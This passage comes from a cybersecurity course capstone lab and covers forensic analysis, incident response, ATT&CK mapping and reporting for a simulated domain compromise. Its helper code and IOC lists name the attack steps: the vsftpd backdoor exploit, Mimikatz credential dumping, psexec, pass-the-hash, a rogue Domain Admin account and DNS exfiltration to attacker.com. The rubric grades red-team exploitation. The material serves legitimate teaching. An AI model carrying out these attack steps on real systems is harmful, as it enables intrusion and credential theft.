python3 vol.py -f ws02_memory.raw windows.dumpfiles --pid <suspicious_pid>
```
3. **Windows Event Log Analysis** (DC01):
```powershell
# Security event logs (authentication)
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4624 or EventID=4625 or EventID=4672)]]" |
Where-Object { $_.TimeCreated -gt (Get-Date).AddHours(-24) } |
Select-Object TimeCreated, Id, Message
# Network (type 3) and RemoteInteractive (type 10) logons with account and source
# (4624 EventData indexes: [5]=TargetUserName, [8]=LogonType, [18]=IpAddress)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} |
Where-Object { $_.Properties[8].Value -in 3,10 } |
Select-Object TimeCreated, @{n='User';e={$_.Properties[5].Value}}, @{n='Type';e={$_.Properties[8].Value}}, @{n='Source';e={$_.Properties[18].Value}}
# Account creation (4720) and additions to global/local/universal groups (4728/4732/4756)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4720,4728,4732,4756}
```
4. **Registry Forensics** (Persistence Mechanisms):
```powershell
# Check Run keys
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
# Scheduled tasks
Get-ScheduledTask | Where-Object { $_.Principal.UserId -eq "SYSTEM" } |
Select-Object TaskName, TaskPath, Date
# Services
Get-Service | Where-Object { $_.StartType -eq "Automatic" -and $_.Status -eq "Running" }
```
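Added example, not part of the original page: the same three checks as the PowerShell above (privileged logons from the wrong place, account creation, privileged group changes), implemented in Python over Security-log events exported as XML (`wevtutil qe Security /f:xml`, or Get-WinEvent's `.ToXml()`), so they run offline on exported evidence. The six events are constructed; the allow-list that treats only WS02 as a legitimate admin source is a lab assumption.

```python
"""Windows Security log analysis over exported XML events."""
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
PRIVILEGED = {"itadmin", "administrator"}
ADMIN_SOURCES = {"10.10.4.21"}             # lab assumption: WS02 is the only admin workstation
LOCAL_SOURCES = {"-", "::1", "127.0.0.1"}  # console/loopback logons carry no remote IP
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample; wevtutil emits bare <Event> elements, wrap them in a root
SAMPLE_XML = """<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<Event><System><EventID>4624</EventID><TimeCreated SystemTime="2026-02-10T14:02:11.0000000Z"/><Computer>WS02.apophis.local</Computer></System>
<EventData><Data Name="TargetUserName">itadmin</Data><Data Name="LogonType">2</Data><Data Name="IpAddress">-</Data></EventData></Event>
<Event><System><EventID>4624</EventID><TimeCreated SystemTime="2026-02-10T21:05:40.0000000Z"/><Computer>WS02.apophis.local</Computer></System>
<EventData><Data Name="TargetUserName">itadmin</Data><Data Name="LogonType">3</Data><Data Name="IpAddress">10.10.2.50</Data></EventData></Event>
<Event><System><EventID>4624</EventID><TimeCreated SystemTime="2026-02-10T21:20:03.0000000Z"/><Computer>DC01.apophis.local</Computer></System>
<EventData><Data Name="TargetUserName">Administrator</Data><Data Name="LogonType">3</Data><Data Name="IpAddress">10.10.2.50</Data></EventData></Event>
<Event><System><EventID>4624</EventID><TimeCreated SystemTime="2026-02-10T21:21:00.0000000Z"/><Computer>DC01.apophis.local</Computer></System>
<EventData><Data Name="TargetUserName">itadmin</Data><Data Name="LogonType">10</Data><Data Name="IpAddress">10.10.4.21</Data></EventData></Event>
<Event><System><EventID>4720</EventID><TimeCreated SystemTime="2026-02-10T21:25:17.0000000Z"/><Computer>DC01.apophis.local</Computer></System>
<EventData><Data Name="SubjectUserName">Administrator</Data><Data Name="TargetUserName">backdoor</Data></EventData></Event>
<Event><System><EventID>4728</EventID><TimeCreated SystemTime="2026-02-10T21:25:20.0000000Z"/><Computer>DC01.apophis.local</Computer></System>
<EventData><Data Name="SubjectUserName">Administrator</Data><Data Name="MemberName">CN=backdoor,CN=Users,DC=apophis,DC=local</Data><Data Name="TargetUserName">Domain Admins</Data></EventData></Event>
</Events>
"""


def parse_events(xml_text):
    """Flatten each <Event> to id/time/computer plus its EventData as a dict."""
    events = []
    for ev in ET.fromstring(xml_text).iter(NS + "Event"):
        system = ev.find(NS + "System")
        events.append({
            "id": int(system.findtext(NS + "EventID")),
            "time": system.find(NS + "TimeCreated").get("SystemTime"),
            "computer": system.findtext(NS + "Computer"),
            "data": {d.get("Name"): (d.text or "") for d in ev.iter(NS + "Data")},
        })
    return events


def privileged_remote_logons(events):
    """4624 network (3) / RemoteInteractive (10) logons of privileged accounts from
    anywhere but the admin workstation: the footprint of psexec/wmiexec pivots."""
    hits = []
    for e in events:
        d = e["data"]
        if e["id"] != 4624 or d.get("LogonType") not in {"3", "10"}:
            continue
        if d.get("TargetUserName", "").lower() not in PRIVILEGED:
            continue
        src = d.get("IpAddress", "-")
        if src in ADMIN_SOURCES or src in LOCAL_SOURCES:
            continue
        hits.append({"time": e["time"], "computer": e["computer"], "user": d["TargetUserName"],
                     "logon_type": d["LogonType"], "source": src})
    return hits


def account_creations(events):
    """4720: who (SubjectUserName) created which account (TargetUserName)."""
    return [{"time": e["time"], "actor": e["data"].get("SubjectUserName"),
             "account": e["data"].get("TargetUserName")} for e in events if e["id"] == 4720]


def privileged_group_additions(events):
    """4728/4732/4756: member added to a global/local/universal group. TargetUserName
    is the group; MemberName is the DN of the principal that was added."""
    return [{"time": e["time"], "actor": e["data"].get("SubjectUserName"),
             "member": e["data"].get("MemberName"), "group": e["data"].get("TargetUserName")}
            for e in events
            if e["id"] in {4728, 4732, 4756} and e["data"].get("TargetUserName") in PRIVILEGED_GROUPS]


def findings(events):
    """Every hit, merged and sorted by SystemTime (fixed-width ISO, sorts as text)."""
    out = [("remote privileged logon", h) for h in privileged_remote_logons(events)]
    out += [("account created", h) for h in account_creations(events)]
    out += [("privileged group change", h) for h in privileged_group_additions(events)]
    return sorted(out, key=lambda f: f[1]["time"])


if __name__ == "__main__":
    for kind, detail in findings(parse_events(SAMPLE_XML)):
        print(f"{detail['time']}  {kind:25s} {detail}")
```

The allow-list is the part to get right on a real network: the rule is not "admin logged on over the network" (admins do that all day) but "admin logged on over the network from a host that is not an admin workstation", which is exactly the tiered-admin model the hardening recommendations call for.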
**Deliverables**:
- [ ] Autopsy case report with timeline
- [ ] Volatility analysis results (processes, network connections)
- [ ] Windows Event Log summary (authentication anomalies)
- [ ] Registry forensics findings (persistence mechanisms)
**Assessment Criteria** (20pts):
- Disk forensics completeness (7pts)
- Memory forensics quality (7pts)
- Event log analysis (4pts)
- Persistence mechanism identification (2pts)
---
### Investigation Phase 4: Incident Response (PICERL) (20 Points)
**Objective**: Execute full incident response lifecycle.
**PICERL Framework** (the SANS six-step model; NIST SP 800-61 folds the same steps into four phases):
1. **Preparation** (Already completed - lab setup)
2. **Identification** (Completed in Phase 1)
3. **Containment** (Short-term and Long-term)
4. **Eradication** (Remove attacker presence)
5. **Recovery** (Restore services)
6. **Lessons Learned** (Post-incident review)
**Tasks**:
1. **Containment Actions** (short-term: stop the attacker, keep the evidence):
```bash
# On pfSense: block the red-team host (the table must be referenced by a pf
# rule for this to take effect; adding the address to a blocked alias in the
# web UI is the equivalent)
pfctl -t blocklist -T add 10.10.2.50
```
```powershell
# On DC01: disable the backdoor account rather than deleting it, so its SID
# still resolves in the logs you are about to analyze
net user backdoor /active:no /domain
# On WS02: kill anything executing out of Temp (capture memory first; Phase 3)
Get-Process | Where-Object { $_.Path -like "*\Temp\*" } | Stop-Process -Force
```
2. **Eradication**:
```powershell
# Remove malware artifacts
Remove-Item "C:\Windows\Temp\update.exe" -Force
# Remove persistence mechanisms
schtasks /delete /tn "Windows Update Check" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SecurityUpdate /f
# Delete backdoor account
net user backdoor /delete /domain
# Reset compromised accounts
net user itadmin NewP@ssw0rd123! /domain
```
3. **Recovery**:
```powershell
# Restore from clean snapshots (if available), otherwise rebuild; a host the
# attacker held as SYSTEM is not trustworthy after file-level cleanup
# Verify AD integrity
dcdiag /v > dcdiag_output.txt
repadmin /replsummary
# The attacker held Domain Admin, so assume the krbtgt hash is gone: reset the
# krbtgt password twice (wait one replication interval between runs) to
# invalidate any golden tickets. ksetup /setenctypeattr only changes the
# encryption types a trust accepts; it does not rotate any key.
Set-ADAccountPassword -Identity krbtgt -Reset
```
4. **Hardening Recommendations**:
- Enable LSASS protection (RunAsPPL; takes effect after a reboot): `Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1 -Type DWord`
- Implement tiered admin model
- Deploy EDR solution (simulate with Sysmon)
- Update firewall rules (segment VLANs further)
**Deliverables**:
- [ ] Containment action log (timestamped)
- [ ] Eradication checklist (completed tasks)
- [ ] System recovery documentation
- [ ] Hardening recommendations report (5+ actionable items)
**Assessment Criteria** (20pts):
- Proper PICERL execution (10pts)
- Completeness of eradication (5pts)
- Quality of hardening recommendations (5pts)
---
### Investigation Phase 5: Threat Intelligence & Attribution (15 Points)
**Objective**: Map attack to MITRE ATT&CK and perform threat actor profiling.
**Tasks**:
1. **MITRE ATT&CK Mapping**:
- Create spreadsheet mapping observed TTPs to ATT&CK techniques
- Use ATT&CK Navigator to visualize coverage
- Identify gaps in detection coverage
2. **Threat Actor Profiling**:
```markdown
# Threat Actor: SERPENT SYNDICATE (Simulated APT)
**Sophistication Level**: Advanced
**Observed TTPs**:
- Initial Access: T1190 (Exploit Public-Facing Application)
- Credential Access: T1003 (OS Credential Dumping)
- Lateral Movement: T1021.002 (SMB/Windows Admin Shares)
- Persistence: T1136 (Create Account), T1053 (Scheduled Task)
- Exfiltration: T1041 (C2 Channel)
**Tools Used**:
- Metasploit Framework
- Impacket suite
- Mimikatz
- Custom PowerShell scripts
**Targeting**: Intellectual property theft, persistent access
**Comparison**: Tooling overlap (Metasploit, Impacket, Mimikatz) is shared by many groups and most red teams, so attribute only as far as the evidence supports. If you compare with a named group such as APT29 (Cozy Bear), justify it with specific TTP overlap; note that this campaign relied on off-the-shelf tooling rather than living-off-the-land techniques.
```
3. **IOC Generation for Threat Intelligence Platforms**:
```csv
indicator,type,severity,context
10.10.2.50,ipv4,high,C2 Server
update.exe,filename,critical,Persistent malware
backdoor,username,critical,Rogue domain account
"Windows Update Check",scheduled_task,high,Persistence mechanism
C:\Windows\Temp\*,filepath,medium,Malware staging directory
```
4. **Dashboard Integration** (MOD8 Link):
- Export MITRE heatmap JSON to `dashboard/src/data/live/mitre_coverage.json`
- Update threat feed with real IOCs
- Visualize attack timeline in Incident Tracker component
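Added example (not the lab's own code): a generator for the two machine-readable deliverables, the ATT&CK Navigator layer that both Attack Phase 7 and this phase ask for, and the IOC CSV in the column layout shown above. The technique list repeats the page's own mapping; which techniques count as detected, the output file names, and the ATT&CK/Navigator version strings are assumptions to adjust.

```python
"""ATT&CK Navigator layer + IOC CSV from the observed-technique list."""
import csv
import io
import json

# The page's mapping: (technique, tactic, evidence note)
OBSERVED = [
    ("T1190", "Initial Access", "vsftpd 2.3.4 backdoor on FILE01"),
    ("T1003.001", "Credential Access", "Mimikatz sekurlsa::logonpasswords on WS02"),
    ("T1021.002", "Lateral Movement", "impacket-psexec to WS02 over ADMIN$"),
    ("T1550.002", "Lateral Movement", "Pass-the-hash to DC01"),
    ("T1136.002", "Persistence", "Domain account 'backdoor' added to Domain Admins"),
    ("T1053.005", "Persistence", "Scheduled task 'Windows Update Check'"),
    ("T1547.001", "Persistence", "Run key 'SecurityUpdate'"),
    ("T1041", "Exfiltration", "exfil.zip over the C2 channel"),
    ("T1048", "Exfiltration", "DNS queries to attacker.com"),
]
DETECTED = {"T1190", "T1041"}   # assumption: what the IDS actually alerted on

IOCS = [   # (indicator, type, severity, context), same columns as the CSV above
    ("10.10.2.50", "ipv4", "high", "C2 server, Kali on VLAN 200"),
    ("C:\\Windows\\Temp\\update.exe", "filepath", "critical", "Staged payload"),
    ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SecurityUpdate", "registry", "high", "Run-key persistence"),
    ("Windows Update Check", "scheduled_task", "high", "Scheduled-task persistence"),
    ("backdoor", "username", "critical", "Rogue Domain Admin account"),
    ("attacker.com", "domain", "high", "DNS exfiltration domain"),
]


def navigator_layer(observed, detected, name="Operation Serpent's Shadow"):
    """Score 2 = observed and detected, 1 = observed but missed. The gradient
    paints the misses red, so the detection-gap view is the same file."""
    techniques = [{
        "techniqueID": tid,
        "tactic": tactic.lower().replace(" ", "-"),   # Navigator wants the short name
        "score": 2 if tid in detected else 1,
        "comment": note,
        "enabled": True,
    } for tid, tactic, note in observed]
    return {
        "name": name,
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Observed TTPs: score 1 = missed by Blue Team, 2 = detected",
        "techniques": techniques,
        "gradient": {"colors": ["#ff6666", "#66ff66"], "minValue": 1, "maxValue": 2},
        "legendItems": [{"label": "observed, not detected", "color": "#ff6666"},
                        {"label": "observed and detected", "color": "#66ff66"}],
    }


def detection_gaps(observed, detected):
    """Techniques that ran without an alert: the 'Detection Gaps' report section."""
    return [tid for tid, _, _ in observed if tid not in detected]


def ioc_csv(iocs):
    """CSV text with a header row; csv handles quoting of commas in the context."""
    buf = io.StringIO()
    w = csv.writer(buf, lineterminator="\n")
    w.writerow(["indicator", "type", "severity", "context"])
    w.writerows(iocs)
    return buf.getvalue()


if __name__ == "__main__":   # file names are assumptions
    with open("MITRE_ATTACK_Layer.json", "w") as fh:
        json.dump(navigator_layer(OBSERVED, DETECTED), fh, indent=2)
    with open("iocs.csv", "w", newline="") as fh:
        fh.write(ioc_csv(IOCS))
    print("Detection gaps:", ", ".join(detection_gaps(OBSERVED, DETECTED)))
```

Load `MITRE_ATTACK_Layer.json` with "Open Existing Layer" in ATT&CK Navigator; the same file is what the MOD8 dashboard's `mitre_coverage.json` export step expects as input.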
**Deliverables**:
- [ ] MITRE ATT&CK Navigator layer file (JSON)
- [ ] Threat actor profile report (2-3 pages)
- [ ] IOC list in STIX format (or CSV)
- [ ] Dashboard integration (screenshot of updated heatmap)
**Assessment Criteria** (15pts):
- Accurate MITRE ATT&CK mapping (7pts)
- Threat actor profiling quality (5pts)
- IOC quality and completeness (3pts)
---
### Investigation Phase 6: Final IR Report (15 Points)
**Objective**: Create comprehensive incident response report for executive leadership.
**Report Structure** (Use `LAB_REPORT_TEMPLATE.md` as base):
```markdown
# Incident Response Report: Operation Serpent's Shadow
## Security Incident #2026-001
**Classification**: CONFIDENTIAL
**Date**: [Current Date]
**Incident Handler**: [Your Name]
**Severity**: CRITICAL
---
## Executive Summary (1 page)
- **What Happened**: Brief overview of the incident
- **Impact**: Systems compromised, data exfiltrated
- **Root Cause**: Unpatched vsftpd vulnerability on legacy server
- **Remediation Status**: All threats eradicated, systems hardened
- **Recommendation**: Decommission FILE01, implement vulnerability management program
---
## Incident Timeline (2-3 pages)
| Timestamp | Event | System | Action |
|-----------|-------|--------|--------|
| 2026-02-10 14:23 | Initial scan detected | FILE01 | Suricata alert fired |
| 2026-02-10 14:45 | vsftpd exploit successful | FILE01 | Attacker gained shell |
| ... | ... | ... | ... |
---
## Technical Analysis (5-7 pages)
### Attack Chain
[Detailed walkthrough of each attack phase]
### Network Forensics
[PCAP analysis findings]
### Host Forensics
[Autopsy/Volatility findings]
### MITRE ATT&CK Mapping
[Table of techniques used]
---
## Indicators of Compromise (1 page)
[Complete IOC list]
---
## Response Actions (2-3 pages)
### Containment
[What was done to stop the attack]
### Eradication
[How threats were removed]
### Recovery
[How systems were restored]
---
## Lessons Learned (2 pages)
### What Went Well
- IDS detected initial scanning activity
- Log retention allowed full forensic analysis
### What Could Be Improved
- Delayed response to initial alerts (simulated)
- Legacy system not in patch management program
- No EDR on endpoints
### Recommendations
1. Implement 24/7 SOC monitoring
2. Deploy EDR across all endpoints
3. Decommission Metasploitable 2 (FILE01)
4. Conduct quarterly red team exercises
5. Implement tiered admin model
---
## Appendices
- Appendix A: Complete IOC List
- Appendix B: MITRE ATT&CK Navigator JSON
- Appendix C: Network Topology Diagram
- Appendix D: Forensic Evidence Inventory
```
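Added example, not part of the template: the incident timeline above is only as good as its clock handling, and this lab's sources disagree on both format and zone (Zeek epoch seconds in UTC, Windows SystemTime with seven fractional digits and a trailing Z, Suricata ISO with a numeric offset, the red-team `script` log in local wall-clock time). This Python normalizes each to UTC and renders the table in the template's layout. The sample events and the assumption that Kali's clock runs at UTC-6 are constructed.

```python
"""Normalize timestamps from the lab's log sources and build one UTC timeline."""
import re
from datetime import datetime, timedelta, timezone

REDTEAM_TZ = timezone(timedelta(hours=-6))   # lab assumption: Kali logs local time at UTC-6
_WINDOWS_RE = re.compile(r"(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})(?:\.(\d+))?Z")

# Constructed events: (source, raw timestamp as that source writes it, system, event)
EVENTS = [
    ("windows", "2026-02-10T21:25:17.0000000Z", "DC01", "Account 'backdoor' created (4720)"),
    ("redteam", "2026-02-10 14:45:10", "Kali", "msf: exploit/unix/ftp/vsftpd_234_backdoor run"),
    ("zeek", "1770756312.000000", "FILE01", "conn 10.10.4.40 -> 10.10.2.50:4444 (reverse shell)"),
    ("suricata", "2026-02-10T14:23:05.000000-0600", "FILE01", "ET SCAN alert from 10.10.2.50"),
]


def normalize(raw, source):
    """Parse one source's timestamp into a timezone-aware datetime. Values keep
    their original offset but compare correctly across sources."""
    if source == "zeek":                          # epoch seconds, always UTC
        return datetime.fromtimestamp(float(raw), tz=timezone.utc)
    if source == "suricata":                      # 2026-02-10T14:45:12.000000-0600
        return datetime.strptime(raw, "%Y-%m-%dT%H:%M:%S.%f%z")
    if source == "windows":                       # SystemTime: up to 7 fractional digits + Z
        m = _WINDOWS_RE.fullmatch(raw)
        if not m:
            raise ValueError(f"unrecognized SystemTime: {raw}")
        frac = (m.group(2) or "")[:6].ljust(6, "0")   # strptime's %f takes at most 6
        return datetime.strptime(f"{m.group(1)}.{frac}", "%Y-%m-%dT%H:%M:%S.%f").replace(tzinfo=timezone.utc)
    if source == "redteam":                       # `date` output in the script log, no zone
        return datetime.strptime(raw, "%Y-%m-%d %H:%M:%S").replace(tzinfo=REDTEAM_TZ)
    raise ValueError(f"unknown source: {source}")


def build_timeline(events):
    """Rows sorted on the real instant, with a UTC string for the report."""
    rows = []
    for source, raw, system, what in events:
        when = normalize(raw, source).astimezone(timezone.utc)
        rows.append({"when": when, "utc": when.strftime("%Y-%m-%d %H:%M:%S"),
                     "source": source, "system": system, "event": what})
    return sorted(rows, key=lambda r: r["when"])


def render_markdown(rows):
    """Markdown table in the template's layout."""
    lines = ["| Timestamp (UTC) | Source | System | Event |", "|---|---|---|---|"]
    lines += [f"| {r['utc']} | {r['source']} | {r['system']} | {r['event']} |" for r in rows]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_markdown(build_timeline(EVENTS)))
```

Pick one zone (UTC) for the whole report and say so in the header; the most common timeline error in these exercises is a Windows event that appears to happen six hours after the Zeek flow that caused it.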
**Deliverables**:
- [ ] Final IR report (PDF, 15-20 pages)
- [ ] Executive briefing (PowerPoint, 5-7 slides)
- [ ] Complete evidence package (ZIP archive)
- [ ] Post-incident review presentation
**Assessment Criteria** (15pts):
- Report professionalism and completeness (7pts)
- Technical accuracy (5pts)
- Actionable recommendations (3pts)
---
## Final Deliverables Checklist
### Red Team Package (100 Points)
- [ ] Attack command logs (`script` output)
- [ ] Screenshots (minimum 15)
- [ ] Red Team report (PDF)
- [ ] MITRE ATT&CK Navigator JSON
- [ ] IOC list (CSV)
- [ ] Exfiltrated data samples
### Blue Team Package (100 Points)
- [ ] Investigation logs
- [ ] Forensic images (disk + memory)
- [ ] PCAP files with annotations
- [ ] Incident Response report (PDF)
- [ ] Executive briefing (PPTX)
- [ ] Remediation documentation
- [ ] Dashboard integration (screenshots)
### Submission Format
Create ZIP archive: `CAPSTONE_YourName_OperationSerpentsShadow.zip`
```
CAPSTONE_YourName_OperationSerpentsShadow/
├── 01_Red_Team/
│ ├── logs/
│ ├── screenshots/
│ ├── loot/
│ ├── exfil/
│ ├── RedTeam_Report.pdf
│ └── MITRE_ATT&CK_Layer.json
├── 02_Blue_Team/
│ ├── forensics/
│ ├── pcaps/
│ ├── logs/
│ ├── IR_Report.pdf
│ ├── Executive_Briefing.pptx
│ └── Remediation_Plan.md
└── README.md (submission summary)
```
---
## Assessment Rubric
### Red Team Assessment (100 Points)
| Phase | Criteria | Points |
|-------|----------|--------|
| Phase 1: Recon | Service enumeration completeness | 10 |
| Phase 2: Initial Access | Successful exploitation | 15 |
| Phase 3: Credential Access | Multiple credential sources | 15 |
| Phase 4: Lateral Movement | Domain system compromise | 20 |
| Phase 5: Privilege Escalation | Domain Admin achieved | 20 |
| Phase 6: Exfiltration | Data extraction success | 10 |
| Phase 7: Reporting | Documentation quality | 10 |
### Blue Team Assessment (100 Points)
| Phase | Criteria | Points |
|-------|----------|--------|
| Phase 1: Detection | Alert triage accuracy | 15 |
| Phase 2: Network Forensics | PCAP analysis quality | 15 |
| Phase 3: Host Forensics | Disk/memory analysis | 20 |
| Phase 4: Incident Response | PICERL execution | 20 |
| Phase 5: Threat Intelligence | MITRE ATT&CK mapping | 15 |
| Phase 6: Final Report | Professional documentation | 15 |
### Total: 200 Points
**Grading Scale**:
- 180-200: Exceptional (A)
- 160-179: Excellent (B)
- 140-159: Good (C)
- Below 140: Needs Improvement (Resubmit)
---
## Additional Resources
### Recommended Reading
- MITRE ATT&CK Framework: https://attack.mitre.org
- NIST SP 800-61r2 (Incident Response Guide)
- SANS Incident Response Poster
- Red Team Field Manual (RTFM)
- Blue Team Field Manual (BTFM)
### Tools Reference
- **Red Team**: Metasploit, Impacket, Mimikatz, BloodHound, CrackMapExec
- **Blue Team**: Volatility 3, Autopsy, Wireshark, Zeek, Suricata, KQL
### Dashboard Integration
- Export MITRE coverage: `dashboard/src/data/live/mitre_coverage.json`
- Update threat feed: `dashboard/src/data/live/threat_feed.json`
- Timeline visualization: Use `Recharts` LineChart component
---
## Post-Capstone Next Steps
After completing this capstone:
1. **Rebuild Lab Environment**: Reset all VMs to clean state
2. **Apply Hardening**: Implement your own remediation recommendations
3. **Re-Attack**: Attempt the same attack chain - what changed?
4. **Advanced Scenarios**: Try different attack paths (web app → AD, phishing simulation)
5. **Contribute to Dashboard**: Add real detection logic to React components
---
## Academic Integrity Statement
This capstone represents your own work and understanding of offensive and defensive security operations. You may use:
- Official tool documentation
- MITRE ATT&CK knowledge base
- Course module materials (MOD0-MOD8)
You may NOT:
- Copy attack scripts without understanding them
- Use automated red team frameworks (Cobalt Strike, Covenant) - manual techniques only
- Plagiarize reports from online sources
**Authorized Use Only**: These techniques are for educational purposes in a controlled lab environment. Unauthorized use against systems you do not own or have explicit permission to test is illegal.
---
## Contact & Support
For technical issues:
- Review module materials (MOD0-MOD8)
- Check `LAB_REPORT_TEMPLATE.md` for report formatting
- Consult `ASSESSMENT_RUBRICS.md` for grading criteria
**Good luck, and remember**: "Order from Chaos" 🐍
---
**END OF CAPSTONE PROJECT**